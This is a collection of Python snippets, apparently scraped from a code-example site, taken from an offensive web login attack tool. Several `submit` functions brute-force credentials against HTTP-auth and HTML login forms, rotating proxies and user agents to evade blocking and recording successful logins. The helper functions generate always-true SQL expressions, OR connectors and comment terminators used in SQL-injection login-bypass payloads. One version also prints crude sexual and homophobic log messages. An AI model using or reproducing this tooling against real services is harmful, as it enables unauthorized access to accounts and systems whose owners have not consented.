Exemplo n.º 1
    def sCon():
        """Build one randomly chosen SQL boolean expression as a string.

        The expression comes from one of three families: a literal
        (``true`` / ``not false``), a random token compared with itself for
        equality, or a comparison (``like``, ``rlike``, ``not like`` or ``>``)
        between random tokens. Each form is meant to evaluate true. A query
        that binds its inputs as parameters treats such text as plain data.

        Returns:
            The expression text, or None if a helper returns a choice that
            none of the branches below handles.
        """
        family = randomFromList(["equal", "static", "compare"])

        if family == "static":
            return randomFromList(["not false", "true"])

        if family == "compare":
            operator = randomFromList(["like", "rlike", "not like", "gl"])

            if operator == "gl":
                first, second = srand(stype="dig"), srand(stype="dig")
                # The larger number goes on the left; two equal draws give "n > n".
                if int(first) > int(second):
                    ordered = (first, second)
                else:
                    ordered = (second, first)
                return "%s > %s" % ordered

            if operator == "not like":
                first, second = srand(stype="char"), srand(stype="char")
                # Redraw until the operands differ, so NOT LIKE holds.
                while first == second:
                    first, second = srand(stype="char"), srand(stype="char")
                return "'%s' %s '%s'" % (first, operator, second)

            # like / rlike: the same token on both sides.
            token = srand(min=3, max=5, stype="char")
            return "'%s' %s '%s'" % (token, operator, token)

        if family == "equal":
            value_type = randomFromList(["char", "dig"])
            token = srand(min=3, max=5, stype=value_type)
            if value_type == "char":
                # Character tokens are quoted as SQL string literals.
                return "'%s'='%s'" % (token, token)
            if value_type == "dig":
                return "%s=%s" % (token, token)

        return None
Exemplo n.º 2
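def submit(options, loginInfo, creds, result):
    """Try one credential pair against an HTTP-authenticated URL and record a hit.

    Args:
        options: run settings; reads ``timeout``, ``proxy``, ``url`` and
            ``verbose``.
        loginInfo: ``(realm, (password_label, username_label))``; the labels
            only appear in log lines.
        creds: ``(password, username)`` -- password first.
        result: queue of ``[url, username, password]`` hits.

    Returns:
        True when ``result`` already holds a hit for this username (no request
        is sent); None otherwise.

    Note:
        Every attempt that does not raise is recorded as a hit, and the tried
        credentials are written to the console in clear text.
    """
    tryPassword, tryUsername = creds
    realm = loginInfo[0]
    fPassword, fUsername = loginInfo[1]

    # Hits are stored as [url, username, password] (see result.put below), so
    # the username is at index 1. Index 0 is the URL and would never match.
    if any(tryUsername == cred[1] for cred in list(result.queue)):
        return True  # don't run if find password of username

    # Bound up front so the log lines in the handler can always format it.
    proxyAddr = ""
    try:
        proc = mBrowser(options.timeout)
        if options.proxy:
            proxyAddr = randomFromList(options.proxy)
            proc.setproxy(proxyAddr)
        proc.httpget_passwd(options.url, tryUsername, tryPassword, realm)

        proc.open_url(options.url)
        if options.verbose:
            if options.proxy:
                printf("[+] {%s: %s; %s: %s through %s}" % (fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
            else:
                printf("[+] {%s: %s; %s: %s}" % (fUsername, tryUsername, fPassword, tryPassword), 'norm')
        printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()), "good")
        result.put([options.url, tryUsername, tryPassword])

    except Exception as err:
        if not hasattr(err, "code"):
            # Not an HTTP status error: hand it to the fatal-error helper.
            die("[x] HTTP GET:", err)
        elif isinstance(err.code, int) and err.code == 401:
            # 401 is the expected reply to a rejected credential pair.
            if options.verbose:
                if options.proxy:
                    printf("[+] {%s: %s; %s: %s through %s}" % (fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')
                    printf("[-] Failed: %s through %s" % ([tryUsername, tryPassword], proxyAddr), "bad")
                else:
                    printf("[+] {%s: %s; %s: %s}" % (fUsername, tryUsername, fPassword, tryPassword), 'norm')
                    printf("[-] Failed: %s" % ([tryUsername, tryPassword]), "bad")
        else:
            # creds is (password, username); reversed for display.
            printf("[x] %s: %s" % (err, creds[::-1]), "bad")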
Exemplo n.º 3
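def submit(options, loginInfo, creds, result):
    """Send one HTTP-auth attempt for a credential pair and classify the status.

    Args:
        options: run settings; reads ``url``, ``proxy`` and ``verbose``.
        loginInfo: ``(realm, [password_label, username_label])``. The labels
            only appear in log lines; ``realm`` is unpacked but unused because
            the call that took it is commented out.
        creds: ``(password, username)`` -- password first.
        result: queue of ``[url, username, password]`` hits.

    Returns:
        True when ``result`` already holds a hit for this username (no request
        is sent); None otherwise.

    Note:
        Any status other than 401, 403, 404 or >= 500 is recorded as a valid
        login, so other replies (a redirect or a rate-limit status, for
        example) are reported as found. Tried credentials are written to the
        console in clear text.
    """
    tryPassword, tryUsername = creds

    realm, [fPassword, fUsername] = loginInfo
    # Skip usernames that already have a recorded hit.
    if any(tryUsername == hit[1] for hit in list(result.queue)):
        return True

    try:
        proc = Browser()
        if options.proxy:
            proxyAddr = randomFromList(options.proxy)
            proc.setproxy(proxyAddr)
        else:
            proxyAddr = ""
        # proc.httpget_passwd(options.url, tryUsername, tryPassword, realm) # BUG
        resp = proc.open_url(options.url, auth=(tryUsername, tryPassword))
        if options.verbose:
            if options.proxy:
                utils.printf("[+] [%s=(%s); %s=(%s)] <--> %s" % (fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'norm')

        status = resp.status_code
        if status == 401:
            if options.verbose:
                if options.proxy:
                    utils.printf("[-] Failed [%s=(%s); %s=(%s)] <--> %s" % (fUsername, tryUsername, fPassword, tryPassword, proxyAddr), 'bad')
        elif status == 403:
            utils.printf("[x] 403 forbidden: [%s:%s] %s" % (tryUsername, tryPassword, proxyAddr), "bad")
        elif status == 404:
            utils.printf("[x] 404 not found: [%s:%s] %s" % (tryUsername, tryPassword, proxyAddr), "bad")
        elif status >= 500:
            # Fixed: the misspelt name `tryPassowrd` raised NameError here, so
            # every 5xx reply ended in utils.die. The "bad" level matches the
            # other error lines.
            utils.printf("[x] %s Server error: [%s:%s] <--> %s" % (status, tryUsername, tryPassword, proxyAddr), "bad")
        else:
            utils.printf("[*] Found: [%s:%s] [%s] --> %s" % (tryUsername, tryPassword, proc.get_title(), proxyAddr), "good")
            result.put([options.url, tryUsername, tryPassword])

    except Exception as err:
        utils.die("[x] HTTP GET:", err)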
Exemplo n.º 4
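def submit(options, loginInfo, tryCred, result):
    """Submit one credential pair to the login form and classify the reply.

    Args:
        options: run settings; reads ``timeout``, ``proxy``, ``login_url``,
            ``url`` and ``verbose``, and is passed on to ``proc.get_opts`` and
            ``check_condition``.
        loginInfo: the login-form description captured earlier; compared with
            the freshly parsed form and passed to ``check_condition``.
        tryCred: ``(password, username)`` -- password first. An empty username
            is handled as a password-only form.
        result: queue of ``[url, username, password]`` hits.

    Returns:
        True when the username already has a hit in ``result`` or the attempt
        ran to completion (hit or miss). False when no login form could be
        parsed or the error handler itself failed. None after an error that
        carried a ``code`` attribute.

    Note:
        Tried credentials are written to the console in clear text.
    """
    tryPassword, tryUsername = tryCred

    # Skip usernames that already have a recorded hit.
    if any(tryUsername == cred[1] for cred in list(result.queue)):
        return True

    # Bound before the try so the handlers and the finally clause never see an
    # unbound name when Browser() or the proxy setup raises.
    proc = None
    proxyAddr = ""
    try:
        proc = Browser(options.timeout)
        if options.proxy:
            # Set proxy connect
            proxyAddr = randomFromList(options.proxy)
            proc.setproxy(proxyAddr)
        proc.open_url(options.login_url)
        proc.get_opts(options)  # TODO remove this function in sbrowser and mbrowser
        _form = parseLoginForm(proc.forms())
        if not _form:
            if options.verbose:
                printf(
                    "[x] LoginBrute: No login form found. Possibly get blocked!"
                )
            return False

        frmCtrl, frmFields = _form
        frmLoginID, btnSubmit = frmCtrl
        if options.verbose and loginInfo != _form:
            printf("[+] Warning: Form field has been changed!")

        proc.xsubmit(frmCtrl, frmFields, tryCred)
        if options.verbose:
            if options.proxy:
                printf(
                    "[+] {%s: %s; %s: %s} through %s" %
                    (frmFields[1], tryUsername, frmFields[0], tryPassword,
                     proxyAddr), 'norm')
            elif len(frmFields) == 2:
                printf(
                    "[+] {%s: %s; %s: %s}" %
                    (frmFields[1], tryUsername, frmFields[0], tryPassword),
                    'norm')
            else:
                printf("[+] {%s: %s}" % (frmFields[0], tryPassword), 'norm')

        # If no login form -> maybe success. Check conditions
        if not parseLoginForm(proc.forms()):
            test_result = check_condition(options, proc, loginInfo)
            if test_result == 1:
                if tryUsername:
                    # Login form with username + password fields.
                    printf(
                        "[*] %s [%s]" %
                        ([tryUsername, tryPassword], proc.get_title()), "good")
                else:
                    # Password-only form. Fixed: the format string had one
                    # placeholder for two arguments and raised TypeError.
                    printf("[*] %s [%s]" % ([tryPassword], proc.get_title()),
                           "good")
                result.put([options.url, tryUsername, tryPassword])
            elif test_result == 2 and options.verbose:
                printf("[+] SQL Injection vulnerable found")
                printf("   %s" % ([tryUsername, tryPassword]), "norm")
            else:
                # Possibly Error. But sometime it is true
                if options.verbose:
                    printf(
                        "[x] Get error page: %s" %
                        ([tryUsername, tryPassword]), "bad")
                    printf("   [x] Page title: ['%s']" % (proc.get_title()),
                           "bad")

        else:
            # Login form is still there: the attempt failed.
            # TODO test if web has similar text (static)
            if check_sqlerror(proc.get_resp()) and options.verbose:
                printf("[+] SQL Injection vulnerable found")
                printf("   %s" % ([tryUsername, tryPassword]), "norm")
            if options.verbose:
                if options.proxy:
                    printf(
                        "[-] Failed: %s through %s" %
                        ([tryUsername, tryPassword], proxyAddr), "bad")
                else:
                    printf("[-] Failed: %s" % ([tryUsername, tryPassword]),
                           "bad")
        return True

    except Exception as error:
        # Sometimes, web servers return error code because of bad
        # configurations, but our cred is true. This block shows information
        # for those special cases.
        try:
            # Fixed: the handler read `err`, a name that is never bound, so
            # every exception fell through to the generic branch below.
            if isinstance(error.code, int) and error.code == 401:
                # Unauthenticated
                if options.verbose:
                    printf("[-] Failed: %s" % ([tryUsername, tryPassword]),
                           "bad")
            elif error.code == 404:
                # Server misconfiguration? Panel URL is deleted or wrong
                printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
                if options.verbose:
                    printf("   %s" % (proc.geturl()), "bad")
            else:
                # Other error code
                if options.verbose:
                    printf("[x] (%s): %s" % (proc.geturl(), tryCred[::-1]),
                           "bad")
        except Exception:
            # Reached when the error has no `code` or logging itself fails.
            # THIS BLOCKED BY WAF
            printf("[x] Loginbrute: %s" % (error), "bad")
            return False

    finally:
        # proc stays None when Browser() itself raised.
        if proc is not None:
            proc.close()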
Exemplo n.º 5
 def useragent(self):
     """Return one User-Agent string picked at random from the bundled list.

     The list is the text returned by ``data.getAgent()``, split on newlines.
     A new pick is made on every call.
     """
     # TODO better useragent with library (or create my own - takes time)
     agents = data.getAgent().split("\n")
     return randomFromList(agents)
Exemplo n.º 6
 def sEnd():
     """Return a trailing SQL comment token picked at random from a fixed list."""
     terminators = ["-- --", "#", "--"]
     return randomFromList(terminators)
Exemplo n.º 7
 def cCon():
     """Return a logical-OR connector, either the keyword or the ``||`` form."""
     connectors = ["or", "||"]
     return randomFromList(connectors)
Exemplo n.º 8
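def submit(options, loginInfo, tryCred, result):
    """Submit one credential pair to the login form and classify the reply.

    Args:
        options: run settings; reads ``proxy``, ``login_url``, ``url`` and
            ``verbose``, and is passed on to ``check_condition``.
        loginInfo: the login-form description captured earlier; compared with
            the freshly parsed form and passed to ``check_condition``.
        tryCred: ``(password, username)`` -- password first. An empty username
            is handled as a password-only form.
        result: queue of ``[url, username, password]`` hits.

    Returns:
        True when the username already has a hit in ``result`` or the attempt
        ran to completion (hit or miss). False when no login form could be
        parsed or the error handler itself failed. None after an error that
        carried a ``code`` attribute.

    Note:
        Tried credentials are written to the console in clear text.
    """
    tryPassword, tryUsername = tryCred

    # Skip usernames that already have a recorded hit.
    if any(tryUsername == hit[1] for hit in list(result.queue)):
        return True

    from libs.mbrowser import Browser

    # Bound before the try so the finally clause never sees an unbound name
    # when Browser() itself raises.
    proc = None
    try:
        proc = Browser()
        if options.proxy:
            # Set proxy connect
            proxyAddr = randomFromList(options.proxy)
            proc.setproxy(proxyAddr)
        else:
            proxyAddr = ""

        proc.open_url(options.login_url)
        _form = parseLoginForm(proc.forms())

        if not _form:
            if options.verbose:
                utils.printf(
                    "[!] Bruteforcer: No login form found, possibly get blocked by WAF of a sort"
                )
            return False

        frmCtrl, frmFields = _form
        frmLoginID, btnSubmit = frmCtrl
        if options.verbose and loginInfo != _form:
            utils.printf("[!] Warning: Login Forms field has been changed...")

        resp = proc.xsubmit(frmCtrl, frmFields, tryCred)
        if options.verbose:
            if len(frmFields) == 2:
                utils.printf(
                    "[+] [%s=(%s); %s=(%s)] <--> %s" %
                    (frmFields[1], tryUsername, frmFields[0], tryPassword,
                     proxyAddr), 'norm')
            else:
                utils.printf(
                    "[+] [%s=(%s)] <--> %s" %
                    (frmFields[0], tryPassword, proxyAddr), 'norm')

        # If no login form -> maybe success. Check conditions
        if not parseLoginForm(proc.forms()):
            test_result = check_condition(options, proc, loginInfo)
            if test_result == 1:
                if tryUsername:
                    # Login form with username + password fields.
                    if resp.status_code == 403:
                        utils.printf(
                            "[!] 403 Forbidden to touch titties: [%s:%s] <--> %s"
                            % (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code == 404:
                        utils.printf(
                            "[!] 404 titties not found... gayyyy: [%s:%s] <--> %s"
                            % (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code >= 500:
                        utils.printf(
                            "[!] %s Server error.. got slapped [%s:%s] <--> %s"
                            % (resp.status_code, tryUsername, tryPassword,
                               proxyAddr), "bad")

                    else:
                        utils.printf(
                            "[+] Found... BIG TITTIESSSS!!: [%s:%s] [%s]" %
                            (tryUsername, tryPassword, proc.get_title()),
                            "good")
                        result.put([options.url, tryUsername, tryPassword])

                else:
                    # Login form with a password field only.
                    if resp.status_code == 403:
                        utils.printf(
                            "[!] 403 Forbidden to touch titties: [%s:%s] %s" %
                            (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code == 404:
                        utils.printf(
                            "[!] 404 titties not found... gayyyy: [%s:%s] %s" %
                            (tryUsername, tryPassword, proxyAddr), "bad")

                    elif resp.status_code >= 500:
                        utils.printf(
                            "[!] %s Server error.. got slapped: [%s:%s] %s" %
                            (resp.status_code, tryUsername, tryPassword,
                             proxyAddr), "bad")

                    else:
                        utils.printf(
                            "[+] Found... BIG TITTIESSSS!!: [%s] [%s]" %
                            (tryPassword, proc.get_title()), "good")
                        result.put([options.url, tryUsername, tryPassword])

            elif test_result == 2 and options.verbose:
                utils.printf(
                    "[+] SQL Injection vulnerability found in login or system. you already know what that means ;) "
                )
                utils.printf("   %s" % ([tryUsername, tryPassword]), "norm")

            else:
                # Possibly an error page, but sometimes the login was valid.
                if options.verbose:
                    utils.printf(
                        "[!] Get error page: %s" %
                        ([tryUsername, tryPassword]), "bad")
                    utils.printf(
                        "   [*] Page title: ['%s']" % (proc.get_title()),
                        "bad")

        else:
            # Login form is still there: the attempt failed.
            # TODO test if web has similar text (static)
            if check_sqlerror(proc.get_resp()) and options.verbose:
                utils.printf(
                    "[+] SQL Injection vulnerability found in login or system. you already know what that means ;) "
                )
                utils.printf("   %s" % ([tryUsername, tryPassword]), "norm")
            if options.verbose:
                if tryUsername:
                    utils.printf(
                        "[-] Failed: [%s:%s] <--> %s ==> %s" %
                        (tryUsername, tryPassword, proxyAddr,
                         proc.get_title()), "bad")
                else:
                    utils.printf(
                        "[-] Failed: [%s] <--> %s ==> %s" %
                        (tryPassword, proxyAddr, proc.get_title()), "bad")

        return True

    except Exception as error:
        # Sometimes, web servers return error code because of bad
        # configurations, but our cred is true. This block shows information
        # for those special cases.
        try:
            # Fixed: the handler read `err`, a name that is never bound, so
            # every exception fell through to the generic branch below.
            if isinstance(error.code, int) and error.code == 401:
                # Unauthenticated
                if options.verbose:
                    utils.printf(
                        "[-] Failed: %s" % ([tryUsername, tryPassword]), "bad")
            elif error.code == 404:
                # Server misconfiguration? Panel URL is deleted or wrong.
                utils.printf("[x] %s: %s" % (error, tryCred[::-1]), "bad")
                if options.verbose:
                    utils.printf("   %s" % (proc.url()), "bad")
            else:
                # Other error code
                if options.verbose:
                    utils.printf("[x] (%s): %s" % (proc.url(), tryCred[::-1]),
                                 "bad")
        except Exception:
            # Reached when the error has no `code` or logging itself fails.
            # THIS BLOCKED BY WAF
            utils.printf("[x] Loginbrute: %s" % (error), "bad")
            return False

    finally:
        # proc stays None when Browser() itself raised.
        if proc is not None:
            proc.close()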